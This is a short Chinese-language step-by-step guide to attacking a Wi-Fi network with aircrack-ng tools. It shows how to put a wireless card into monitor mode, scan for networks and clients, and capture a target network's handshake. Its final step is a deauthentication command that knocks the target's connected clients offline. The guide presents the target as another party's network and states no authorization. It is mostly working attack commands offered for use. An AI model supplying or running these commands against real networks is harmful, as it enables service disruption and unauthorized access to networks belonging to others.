1.查看网卡
airmon-ng
2.将网卡设置为监听模式
airmon-ng start [网卡]
设置后网卡名会变成[网卡名mon],这里和下面都用wlan0mon
3.扫描wifi
airodump-ng wlan0mon
可以按a切换到同时看 wifi列表mac地址和客户端mac地址
如果想只看某一个wifi的信息可以用
airodump-ng --bssid [对方的mac] wlan0mon
这样方便获取该wifi下的连接客户端mac用于接下来攻击
4.获取握手包
airodump-ng --bssid [目标wifimac] -c [目标wifi信道] -w [保存的文件名] wlan0mon
注意!!!这里一定要与对方wifi信道相同否则抓不到握手包,也攻击不了
5.强制对方连接的客户端下线
新开一个窗口
aireplay-ng -0 [次数] -a [目标wifimac] -c [目标wifi连接的客户端mac] wlan0mon